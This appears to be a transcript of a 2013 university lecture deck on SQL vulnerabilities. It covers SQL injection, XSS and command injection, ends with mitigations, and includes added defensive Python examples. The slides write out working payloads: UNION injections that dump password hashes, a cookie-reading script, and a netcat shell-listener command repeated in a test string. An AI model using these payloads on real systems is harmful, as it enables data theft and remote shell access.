
SQL Vulnerabilities

SQL Vulnerabilities. Nick Tsamis University of Tulsa CS 7493 April 2013. What is SQL? Why SQL Matters. *yawn* What’s the big deal? What could possibly go wrong? SQL Injection XSS Command Execution * pffft * So we shouldn’t use SQL? That’s some smart SQL!. Outline.


Presentation Transcript


  1. SQL Vulnerabilities Nick Tsamis University of Tulsa CS 7493 April 2013

  2. Outline
  • What is SQL?
  • Why SQL Matters.
  • *yawn* What’s the big deal?
  • What could possibly go wrong?
    • SQL Injection
    • XSS
    • Command Execution
  • *pffft* So we shouldn’t use SQL?
  • That’s some smart SQL!

  3. What is SQL?
  • Structured Query Language
    • Language
      • Specialized programming language
      • Utilized in relational databases
    • Query
      • Raw data is queried to obtain information
      • “Our business is turning data into information.” – Michael A. Peterson
    • Structured
      • Adheres to a strict, defined format
  [figure: anatomy of a SQL statement, labelled Query, Table, Column]

  4. Relational Databases vs Hierarchical Databases
  • Top down flow only
  • Data relations are stored

  5. Why SQL Matters.
  • Popularity
    • One of the first commercial languages for relational models
    • Today, exists as the de facto standard (ANSI and ISO)
    • It’s EVERYWHERE
  • Versatility
    • It’s flexible:
      • T-SQL
      • MySQL
      • LINQ

  6. *yawn* What’s the big deal?
  • Vulnerabilities
    • SQL is powerful…if you grant it
    • Manages data, some of which is sensitive
    • Provides a great entry point for access
  • Recovering lost password:
    • Security is not always implicit
    • Raw SQL can be very vulnerable to simple injections
    • if $EMAIL = "anything' OR 'x'='x"

  7. What could possibly go wrong? Injections.
  • SQL Injection
    • Injecting unintended code into a query
  • Returning user name from ID
    • Source code
    • The attack
      • We add a second condition that will always evaluate true (1=1)
      • Purpose is to dump all user information
      • $id = ' or 1=1 #
      • WHERE user_id = ' ' or 1=1 # ' ";

  8. What could possibly go wrong? Injections.
  • SQL Injection
    • Injecting unintended code into a query
  • Returning SQL information
    • The attack(s)
      • We add a union select to dump additional data
      • $id = ' union SELECT 1, user() #
        • Yields current SQL user
      • $id = ' and 1=1 union select database(),version() #
        • Yields current SQL version and database name

  9. What could possibly go wrong? Injections.
  • SQL Injection
    • Injecting unintended code into a query
  • Case Study
    • Returning the good stuff!!
    • The attack(s)
      • We add a union select to dump password data
      • $id = ' union select user, password FROM users #
        • Yields current user and associated password (hash)

  10. What could possibly go wrong? XSS.
  • XSS (Cross Site Scripting)
    • Execute unintended scripts inline
  • Throw an alert
    • Passed as a URL argument
    • What if we put an inline script in that URL?
    • Alert box shown:

  11. What could possibly go wrong? XSS.
  • XSS (Cross Site Scripting)
    • Well that wasn’t exactly l33t…
  • Have a cookie
    • <script>alert(document.cookie)</script>
    • Alert box shown:
  • More serious implications:
    • Run a custom script that can open a remote connection (backdoor)
    • Read and dump configuration data (SQL or OS)

  12. What could possibly go wrong? Execution.
  • Command Execution
    • Use the secret entrance
  • A site that allows for free IP Pinging
    • Sample source:
    • Concatenating commands might work…
    • 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe
    • Attempts to allow connections on port 8999 with netcat (nc)
    • Upon execution, browser waits for connection on port 8999
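The ping page on this slide fails because user input is concatenated into a shell command line. The following is an added example (not code from the deck) of the defensive shape: the input is accepted only if it parses as a literal IP address, and the command is executed as an argument vector with no shell, so ";" and "|" never reach a command parser. The function names are the example's own.

```python
import ipaddress
import subprocess

# Constructed: the injection string shown on the slide, used only as a
# negative test case for the validator below.
INJECTION = "192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe"


def parse_ping_target(user_input):
    """Allowlist validation: accept only a literal IPv4/IPv6 address.

    ipaddress.ip_address() raises ValueError for anything else, so the
    separator characters the slide relies on never get past this point.
    """
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        raise ValueError("not an IP address: %r" % user_input)


def build_ping_argv(user_input):
    """Second layer: an argv list for subprocess, never a shell string.

    Even if validation were skipped, ';' and '|' inside one argv element are
    plain bytes handed to ping, not operators for /bin/sh.
    """
    return ["ping", "-c", "1", parse_ping_target(user_input)]


def run_ping(user_input):
    # shell=False is the default: no command-line parser ever sees the input.
    return subprocess.run(build_ping_argv(user_input),
                          capture_output=True, text=True, timeout=10)


def is_rejected(user_input):
    """True when the input would be refused before any process is started."""
    try:
        build_ping_argv(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(build_ping_argv("192.168.200.128"))
    print("injection rejected:", is_rejected(INJECTION))
```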

  13. *pffft* So we shouldn’t use SQL? No, we should use better SQL.
  • Better SQL
  • Stored Procedures
    • Preformat and secure a static query
    • Grant access to a SP, not the tables it accesses
    • Typically increased performance
      • Parameter check – data typing
      • No network traffic – run inside the engine
  • String Filtering/Escaping
    • String escape characters
      • '
      • "
      • \
      • NUL

  14. *pffft* So we shouldn’t use SQL? No, we should use better SQL.
  • Mo’ Better SQL
  • Parameterized SQL
    • Strongly typed data is bound on execution
    • Parameters are populated and checked
    • User input is not directly embedded
  • Database Management
    • Permission limitation
    • Principle of Least Privilege
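To tie slide 6's raw-SQL lookup to slide 14's parameterized fix, here is an added example (not code from the deck) that runs both against the same constructed in-memory SQLite table and feeds each the $EMAIL payload from slide 6. The table layout, column names and rows are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data: a tiny users table standing in for the
    deck's database (assumed columns: user, password, email)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "alice@example.test"),
         ("bob", "hash-b", "bob@example.test"),
         ("carol", "hash-c", "carol@example.test")],
    )
    return conn


def lookup_vulnerable(conn, email):
    """Slide 6's raw SQL: user input concatenated into the query text."""
    sql = "SELECT user FROM users WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, email):
    """Slide 14's fix: the value is bound as a parameter, so the database
    treats it as data and never parses it as SQL."""
    sql = "SELECT user FROM users WHERE email = ?"
    return [row[0] for row in conn.execute(sql, (email,))]


# Slide 6's payload. In the concatenated query the quote closes the string
# literal and OR 'x'='x' makes the WHERE clause true for every row.
PAYLOAD = "anything' OR 'x'='x"


def demo():
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),      # every user
        "parameterized": lookup_parameterized(conn, PAYLOAD),  # no match
        "legit": lookup_parameterized(conn, "bob@example.test"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```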

  15. Questions?

  16. References
  • http://upload.wikimedia.org/wikipedia/commons/thumb/e/eb/Hierarchical_Model.svg/320px-Hierarchical_Model.svg.png
  • http://www.ibm.com/developerworks/library/x-matters8/relat.gif
  • http://upload.wikimedia.org/wikipedia/commons/a/aa/SQL_ANATOMY_wiki.svg
  • http://www.unixwiz.net/techtips/sql-injection.html
  • http://wikipedia.org
  • http://www.codinghorror.com/blog/2005/04/give-me-parameterized-sql-or-give-me-death.html
